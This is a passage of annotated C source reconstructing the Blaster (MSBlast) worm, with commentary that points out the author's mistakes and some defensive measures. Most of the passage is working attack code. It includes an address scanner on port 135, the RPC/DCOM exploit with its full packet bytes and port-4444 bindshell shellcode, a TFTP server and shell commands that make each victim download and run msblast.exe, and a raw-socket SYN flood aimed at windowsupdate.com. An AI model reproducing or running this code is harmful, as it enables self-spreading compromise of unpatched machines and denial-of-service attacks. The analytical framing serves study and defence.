* tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents
* the IP address of the attacker).
* Once it sends the string, it then waits for 20 seconds for the
* TFTP server to end. If the TFTP server doesn't end, it calls
* TerminateThread.
*/
DWORD WINAPI blaster_tftp_thread(LPVOID p)
{
/*
* This is the protocol format of a TFTP packet. This isn't
* used in the code -- I just provide it here for reference
*/
struct TFTP_Packet
{
short opcode;
short block_id;
char data[512];
};

char reqbuf[512]; /* request packet buffer */
struct sockaddr_in server; /* server-side port number */
struct sockaddr_in client; /* client IP address and port */
int sizeof_client; /* size of the client structure*/
char rspbuf[512]; /* response packet */

static int fd; /* the socket for the server*/
register FILE *fp;
register block_id;
register int block_size;

/* Set a flag indicating this thread is running. The other
* thread will check this for 20 seconds to see if the TFTP
* service is still alive. If this thread is still alive in
* 20 seconds, it will be killed.
*/
is_tftp_running = TRUE; /*1 == TRUE*/

/* Create a server-socket to listen for UDP requests on */
fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd == SOCKET_ERROR)
goto closesocket_and_exit;

/* Bind the socket to 69/udp */
memset(&server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(TFTP_PORT_69);
server.sin_addr.s_addr = 0; /*TFTP server addr = <any>*/
if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0)
goto closesocket_and_exit;

/* Receive a packet, any packet. The contents of the received
* packet are ignored. This means, BTW, that a defensive
* "worm-kill" could send a packet from somewhere else. This
* will cause the TFTP server to download the msblast.exe
* file to the wrong location, preventing the victim from
* doing the download. */
sizeof_client = sizeof(client);
if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0,
(struct sockaddr*)&client, &sizeof_client) <= 0)
goto closesocket_and_exit;

/* The TFTP server will respond with many 512 byte blocks
* until it has completely sent the file; each block must
* have a unique ID, and each block must be acknowledged.
* BUFORD: The worm ignores TFTP ACKs. This is probably why
* the worm restarts the TFTP service rather than leaving it
* enabled: it essentially flushes all the ACKs from the
* the incoming packet queue. If the ACKs aren't flushed,
* the worm will incorrectly treat them as TFTP requests.
*/
block_id = 0;

/* Open this file. GetModuleFilename was used to figure out
* this filename. */
fp = fopen(msblast_filename, "rb");
if (fp == NULL)
goto closesocket_and_exit;

/* Continue sending file fragments until none are left */
for (;;) {
block_id++;

/* Build TFTP header */
#define TFTP_OPCODE_DATA 3
*(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA);
*(short*)(rspbuf+2)= htons((short)block_id);

/* Read next block of data (about 12 blocks total need
* to be read) */
block_size = fread(rspbuf+4, 1, 512, fp);

/* Increase the effective length to include the TFTP
* head built above */
block_size += 4;

/* Send this block */
if (sendto(fd, (char*)&rspbuf, block_size,
0, (struct sockaddr*)&client, sizeof_client) <= 0)
break;

/* Sleep for a bit.
* The reason for this is because the worm doesn't care
* about retransmits -- it therefore must send these
* packets slow enough so congestion doesn't drop them.
* If it misses a packet, then it will DoS the victim
* without actually infecting it. Worse: the intended
* victim will continue to send packets, preventing the
* worm from infecting new systems because the
* requests will misdirect TFTP. This design is very
* bad, and is my bet as the biggest single factor
* that slows down the worm. */
Sleep(900);

/* File transfer ends when the last block is read, which
* will likely be smaller than a full-sized block*/
if (block_size != sizeof(rspbuf)) {
fclose(fp);
fp = NULL;
break;
}
}

if (fp != NULL)
fclose(fp);

closesocket_and_exit:

/* Notify that the thread has stopped, so that the waiting
* thread can continue on */
is_tftp_running = FALSE;
closesocket(fd);
ExitThread(0);

return 0;
}




/*
* This function increments the IP address.
* BUFORD: This conversion from numbers, to strings, then back
* to number is overly complicated. Experienced programmers
* would simply store the number and increment it. This shows
* that Buford does not have much experience work with
* IP addresses.
*/
void blaster_increment_ip_address()
{
for (;;) {
if (ClassD <= 254) {
ClassD++;
return;
}

ClassD = 0;
ClassC++;
if (ClassC <= 254)
return;
ClassC = 0;
ClassB++;
if (ClassB <= 254)
return;
ClassB = 0;
ClassA++;
if (ClassA <= 254)
continue;
ClassA = 0;
return;
}
}


/*
* This is called from the main( function in an
* infinite loop. It scans the next 20 addresses,
* then exits.
*/
void blaster_spreader()
{
fd_set writefds;

register int i;
struct sockaddr_in sin;
struct sockaddr_in peer;
int sizeof_peer;
int sockarray[20];
int opt = 1;
const char *victim_ip;

/* Create the beginnings of a "socket-address" structure that
* will be used repeatedly below on the 'connect()' call for
* each socket. This structure specified port 135, which is
* the port used for RPC/DCOM. */
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(MSRCP_PORT_135);

/* Create an array of 20 socket descriptors */
for (i=0; i<20; i++) {
sockarray[i] = socket(AF_INET, SOCK_STREAM, 0);
if (sockarray[i] == -1)
return;
ioctlsocket(sockarray[i], FIONBIO , &opt);
}

/* Initiate a "non-blocking" connection on all 20 sockets
* that were created above.
* FAQ: Essentially, this means that the worm has 20
* "threads" -- even though they aren't true threads.
*/
for (i=0; i<20; i++) {
int ip;

blaster_increment_ip_address();
sprintf(target_ip_string, "%i.%i.%i.%i",
ClassA, ClassB, ClassC, ClassD);

ip = inet_addr(target_ip_string);
if (ip == -1)
return;
sin.sin_addr.s_addr = ip;
connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin));
}

/* Wait 1.8-seconds for a connection.
* BUG: this is often not enough, especially when a packet
* is lost due to congestion. A small timeout actually makes
* the worm slower than faster */
Sleep(1800);

/* Now test to see which of those 20 connections succeeded.
* BUFORD: a more experienced programmer would have done
* a single 'select()' across all sockets rather than
* repeated calls for each socket. */
for (i=0; i<20; i++) {
struct timeval timeout;
int nfds;

timeout.tv_sec = 0;
timeout.tv_usec = 0;
nfds = 0;

FD_ZERO(&writefds);
FD_SET((unsigned)sockarray[i], &writefds);

if (select(0, NULL, &writefds, NULL, &timeout) != 1) {
closesocket(sockarray[i]);
} else {
sizeof_peer = sizeof(peer);
getpeername(sockarray[i],
(struct sockaddr*)&peer, &sizeof_peer);
victim_ip = inet_ntoa(peer.sin_addr);

/* If connection succeeds, exploit the victim */
blaster_exploit_target(sockarray[i], victim_ip);
closesocket(sockarray[i]);
}
}

}

/*
* This is where the victim is actually exploited. It is the same
* exploit as created by xfocus and altered by HDMoore.
* There are a couple of differences. The first is that the in
* those older exploits, this function itself would create the
* socket and connect, whereas in Blaster, the socket is already
* connected to the victim via the scanning function above. The
* second difference is that the packets/shellcode blocks are
* declared as stack variables rather than as static globals.
* Finally, whereas the older exploits give the hacker a
* "shell prompt", this one automates usage of the shell-prompt
* to tell the victim to TFTP the worm down and run it.
*/
void blaster_exploit_target(int sock, const char *victim_ip)
{

/* These blocks of data are just the same ones copied from the
* xfocus exploit prototype. Whereas the original exploit
* declared these as "static" variables, Blaster declares
* these as "stack" variables. This is because the xfocus
* exploit altered them -- they must be reset back to their
* original values every time. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};



unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* return address */

"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */

/* port 4444 bindshell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";



unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int ThreadId;
int len;
int sizeof_sa;
int ret;
int opt;
void *hThread;
struct sockaddr_in target_ip;
struct sockaddr_in sa;
int fd;
char cmdstr[0x200];
int len1;
unsigned char buf2[0x1000];
int i;

/*
* Turn off non-blocking (i.e. re-enable blocking mode)
* DEFENSE: Tarpit programs (e.g. 'labrea' or 'deredoc')
* will slow down the spread of this worm. It takes a long
* time for blocking calls to timeout. I had several
* thousand worms halted by my 'deredoc' tarpit.
*/
opt = 0;
ioctlsocket(sock, FIONBIO , &opt);

/*
* Choose whether the exploit targets Win2k or WinXP.
*/
if (winxp1_or_win2k2 == 1)
ret = 0x100139d;
else
ret = 0x18759f;
memcpy(sc+36, (unsigned char *) &ret, 4);

/* ----------------------------------------------
* This section is just copied from the original exploit
* script. This is the same as the scripts that have been
* widely published on the Internet. */
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);

*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;


*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long*)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;

if (send(sock,bindstr,sizeof(bindstr),0)== -1)
{
//perror("- Send");
return;
}


if (send(sock,buf2,len1,0)== -1)
{
//perror("- Send");
return;
}
closesocket(sock);
Sleep(400);
/* ----------------------------------------------*/


/*
* This section of code connects to the victim on port 4444.
* DEFENSE : This means you can block this worm by blocking
* TCP port 4444.
* FAQ: This port is only open for the brief instant needed
* to exploit the victim. Therefore, you can't scan for
* port 4444 in order to find Blaster victims.
*/
if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1)
return;
memset(&target_ip, 0, sizeof(target_ip));
target_ip.sin_family = AF_INET;
target_ip.sin_port = htons(SHELL_PORT_4444);
target_ip.sin_addr.s_addr = inet_addr(victim_ip);
if (target_ip.sin_addr.s_addr == SOCKET_ERROR)
return;
if (connect(fd, (struct sockaddr*)&target_ip,
sizeof(target_ip)) == SOCKET_ERROR)
return;

/*
* This section recreates the IP address from whatever IP
* address this successfully connected to. In practice,
* the strings "victim_ip" and "target_ip_string" should be
* the same.
*/
memset(target_ip_string, 0, sizeof(target_ip_string));
sizeof_sa = sizeof(sa);
getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa);
sprintf(target_ip_string, "%d.%d.%d.%d",
sa.sin_addr.s_net, sa.sin_addr.s_host,
sa.sin_addr.s_lh, sa.sin_addr.s_impno);

/*
* This section creates a temporary TFTP service that is
* ONLY alive during the period of time that the victim
* needs to download.
* FAQ: You can't scan for TFTP in order to find Blaster
* victims because the port is rarely open.
*/
if (fd_tftp_service)
closesocket(fd_tftp_service);
hThread = CreateThread(0,0,
blaster_tftp_thread,0,0,&ThreadId);
Sleep(80); /*give time for thread to start*/

/*
* This sends the command
* tftp -i 1.2.3.4 GET msblast.exe
* to the victim. The "tftp.exe" program is built into
* Windows. It's intended purpose is to allow users to
* manually update their home wireless access points with
* new software (and other similar tasks). However, it is
* not intended as a generic file-transfer protocol (it
* stands for "trivial-file-transfer-protocol" -- it is
* intended for only trivial tasks). Since a lot of hacker
* exploits use the "tftp.exe" program, a good hardening
* step is to remove/rename it.
*/
sprintf(cmdstr, "tftp -i %s GET %s\n",
target_ip_string, MSBLAST_EXE);
if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)
goto closesocket_and_return;

/*
* Wait 21 seconds for the victim to request the file, then
* for the file to be delivered via TFTP.
*/
Sleep(1000);
for (i=0; i<10 && is_tftp_running; i++)
Sleep(2000);

/*
* Assume the the transfer is successful, and send the
* command to start executing the newly downloaded program.
* BUFORD: The hacker starts this twice. Again, it
* demonstrates a lock of confidence, so he makes sure it's
* started by doing it twice in slightly different ways.
* Note that the "BILLY" mutex will prevent from actually
* running twice.
*/
sprintf(cmdstr, "start %s\n", MSBLAST_EXE);
if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)
goto closesocket_and_return;
Sleep(2000);
sprintf(cmdstr, "%s\n", MSBLAST_EXE);
send(fd, cmdstr, strlen(cmdstr), 0);
Sleep(2000);


/*
* This section closes the things started in this procedure
*/
closesocket_and_return:

/* Close the socket for the remote command-prompt that has
* been established to the victim. */
if (fd != 0)
closesocket(fd);

/* Close the TFTP server that was launched above. As noted,
* this means that the TFTP service is not running most of
* the time, so it's not easy to scan for infected systems.
*/
if (is_tftp_running) {
TerminateThread(hThread,0);
closesocket(fd_tftp_service);
is_tftp_running = 0;
}
CloseHandle(hThread);
}


/**
* Convert the name into an IP address. If the IP address
* is formatted in decimal-dot-notation (e.g. 192.2.0.43),
* then return that IP address, otherwise do a DNS lookup
* on the address. Note that in the case of the worm,
* it always gives the string "windowsupdate.com" to this
* function, and since Microsoft turned off that name,
* the DNS lookup will usually fail, so this function
* generally returns -1 (SOCKET_ERROR), which means the
* address 255.255.255.255.
*/
int blaster_resolve_ip(const char *windowsupdate_com)
{
int result;

result = inet_addr(windowsupdate_com);
if (result == SOCKET_ERROR) {
HOSTENT *p_hostent = gethostbyname(windowsupdate_com);
if (p_hostent == NULL)
result = SOCKET_ERROR;
else
result = *p_hostent->h_addr;
}

return result;
}


/*
* This thre
*/
ULONG WINAPI blaster_DoS_thread(LPVOID p)
{
int opt = 1;
int fd;
int target_ip;


/* Lookup the domain-name. Note that no checking is done
* to ensure that the name is valid. Since Microsoft turned
* this off in their domain-name servers, this function now
* returns -1. */
target_ip = blaster_resolve_ip("windowsupdate.com");


/* Create a socket that the worm will blast packets at
* Microsoft from. This is what is known as a "raw" socket.
* So-called "raw-sockets" are ones where packets are
* custom-built by the programmer rather than by the TCP/IP
* stack. Note that raw-sockets were not available in Windows
* until Win2k. A cybersecurity pundit called Microsoft
* "irresponsible" for adding them.
* <http://grc.com/dos/sockettome.htm>
* That's probably an
* unfairly harsh judgement (such sockets are available in
* every other OS), but it's true that it puts the power of
* SYNflood attacks in the hands of lame worm writers. While
* the worm-writer would probably have chosen a different
* DoS, such as Slammer-style UDP floods, it's likely that
* Buford wouldn't have been able to create a SYNflood if
* raw-sockets had not been added to Win2k/WinXP. */
fd = WSASocket(
AF_INET, /*TCP/IP sockets*/
SOCK_RAW, /*Custom TCP/IP headers*/
IPPROTO_RAW,
NULL,
0,
WSA_FLAG_OVERLAPPED
);
if (fd == SOCKET_ERROR)
return 0;

/* Tell the raw-socket that IP headers will be created by the
* programmer rather than the stack. Most raw sockets in
* Windows will also have this option set. */
if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL,
(char*)&opt, sizeof(opt)) == SOCKET_ERROR)
return 0;


/* Now do the SYN flood. The worm writer decided to flood
* slowly by putting a 20-millisecond delay between packets
* -- causing only 500 packets/second, or roughly, 200-kbps.
* There are a couple of reasons why the hacker may have
* chosen this.
* 1. SYNfloods are not intended to be bandwidth floods,
* even slow rates are hard to deal with.
* 2. Slammer DoSed both the sender and receiver, therefore
* senders hunted down infected systems and removed
* them. This won't DoS the sender, so people are more
* likely not to care about a few infected machines.
*/
for (;;) {
blaster_send_syn_packet(target_ip, fd;

/* Q: How fast does it send the SYNflood?
* A: About 50 packets/second, where each packet is
* 320-bits in size, for a total of 15-kbps.
* It means that Buford probably intended for
* dialup users to be a big source of the DoS
* attack. He was smart enough to realize that
* faster floods would lead to users discovering
* the worm and turning it off. */
Sleep(20);
}


closesocket(fd);
return 0;
}



/*
* This is a standard TCP/IP checksum algorithm
* that you find all over the web.
*/
int blaster_checksum(const void *bufv, int length)
{
const unsigned short *buf = (const unsigned short *)bufv;
unsigned long result = 0;

while (length > 1) {
result += *(buf++);
length -= sizeof(*buf);
}
if (length) result += *(unsigned char*)buf;
result = (result >> 16) + (result & 0xFFFF);
